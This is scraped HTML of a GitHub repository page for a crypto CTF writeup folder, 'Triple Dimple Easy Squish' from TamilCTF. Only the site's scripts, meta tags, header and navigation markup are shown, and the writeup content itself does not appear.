integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3R5+VhOHwJbG+s7VKlj1HjwVKo/RPldgUh98Yed4XMlk1jH7LP20vRYmLUqnvVaZcgx9x9XdWmQWKaBRQfsVvg==" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-dd1e7e56.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-CfJc9iAnfLJnxnvSY41oW/N+iuVSia2CCj/v47XVliM9ACQPKur94EPHnokX0RG8e+FPMhJ2CGy9FfqLYZi4Dg==" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-09f25cf6.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Y9QCffkHDk3/KAoYUMhKeokbNlXWgpO+53XrccRwhUWzMTxEmhnp1ce7OVWP3vOzhCfWaxxnKWW9eVjjny8nRA==" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-63d4027d.js"></script>
<meta name="viewport" content="width=device-width"> <title>CTF-Writeups/TamilCTF/Crypto/Triple Dimple Easy Squish at main · 0xM4hm0ud/CTF-Writeups · GitHub</title> <meta name="description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/TamilCTF/Crypto/Triple Dimple Easy Squish at main · 0xM4hm0ud/CTF-Writeups" /><meta name="twitter:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta property="og:image:alt" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/TamilCTF/Crypto/Triple Dimple Easy Squish at main · 0xM4hm0ud/CTF-Writeups" /><meta property="og:url" content="https://github.com/0xM4hm0ud/CTF-Writeups" /><meta property="og:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="B2B5:5EA8:173C313:186AE21:61830690" data-pjax-transient="true"/><meta name="html-safe-nonce" content="a2f859d8beb0b6ed36b9f74bca3cb0d58fd60ae9c53ca1b336ed4c9354ccd4d3" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCMkI1OjVFQTg6MTczQzMxMzoxODZBRTIxOjYxODMwNjkwIiwidmlzaXRvcl9pZCI6Ijg2ODY2NjIwMjQ1NTU1OTU0MDgiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="60a5e28b9161f9ac799ba1fa530247f74cc6472c30b82688c416395906f689b4" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:391709258" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-pjax-transient="true" />
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/0xM4hm0ud/CTF-Writeups git https://github.com/0xM4hm0ud/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="80924519" /><meta name="octolytics-dimension-user_login" content="0xM4hm0ud" /><meta name="octolytics-dimension-repository_id" content="391709258" /><meta name="octolytics-dimension-repository_nwo" content="0xM4hm0ud/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="391709258" /><meta name="octolytics-dimension-repository_network_root_nwo" content="0xM4hm0ud/CTF-Writeups" />
<link rel="canonical" href="https://github.com/0xM4hm0ud/CTF-Writeups/tree/main/TamilCTF/Crypto/Triple%20Dimple%20Easy%20Squish" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="391709258" data-scoped-search-url="/0xM4hm0ud/CTF-Writeups/search" data-owner-scoped-search-url="/users/0xM4hm0ud/search" data-unscoped-search-url="/search" action="/0xM4hm0ud/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="YttTS2OSch1xWgVKBBe0Nrc/JvFAW1crOyaAMLJJRfucsVoBgc4u4VB18f/n4ReUZh7+F+2GHDfJch91Nkl3Nw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> 0xM4hm0ud </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span></h1>
</div>
